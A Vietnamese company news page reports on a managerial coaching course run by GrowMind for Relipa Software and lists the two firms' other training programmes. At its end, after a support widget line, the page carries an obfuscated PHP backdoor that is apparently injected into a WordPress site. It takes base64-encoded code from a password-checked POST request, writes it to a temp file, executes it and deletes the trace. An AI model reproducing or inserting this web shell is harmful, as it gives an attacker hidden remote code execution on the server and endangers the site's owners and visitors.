GROWMIND ĐỒNG HÀNH TRIỂN KHAI CHƯƠNG TRÌNH “ĐÀO TẠO KỸ NĂNG HUẤN LUYỆN DÀNH CHO QUẢN LÝ” TẠI RELIPA

Ngày nay, Coaching được xem là 1 trong những kỹ năng thiết yếu được các công ty, tập đoàn lớn rất chú trọng khi phát triển nguồn nhân lực, đặc biệt là phát triển năng lực đội ngũ quản lý. Thấu hiểu điều này, Relipa Software đã quyết định đồng hành cùng GrowMind triển khai khoá học “Kỹ năng huấn luyện dành cho Quản lý”. Khoá học diễn ra trong vòng 04 buổi, với rất nhiều phương pháp đào tạo được sử dụng:
  • Hoạt động thực hành và thảo luận theo nhóm
  • Hoạt động coaching 1:1
  • Thực hành cá nhân
Và có rất nhiều hoạt động mang tính trải nghiệm để học viên tự khám phá kiến thức nhờ sự dẫn dắt của giảng viên. Cuối khoá học, Anh/Chị học viên đã chia sẻ rằng kiến thức được học có thể áp dụng ngay, và “chân lý” được đúc kết là: Với vai trò là một quản lý, nếu bạn đang áp dụng một phương pháp huấn luyện cho tất cả các kiểu nhân viên thì cần phải xem xét lại. GrowMind chúc cho Anh/Chị tại Relipa luôn vững bước trên con đường trồng người sắp tới!

Các chương trình hợp tác khác giữa GrowMind và Relipa
  • Chương trình Đào tạo Fresher
  • Chương trình Đào tạo Tester chuyên nghiệp
  • Chương trình Công dân toàn cầu – Global Citizen
  • Xây dựng văn hoá chia sẻ
1
Bạn cần hỗ trợ?
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}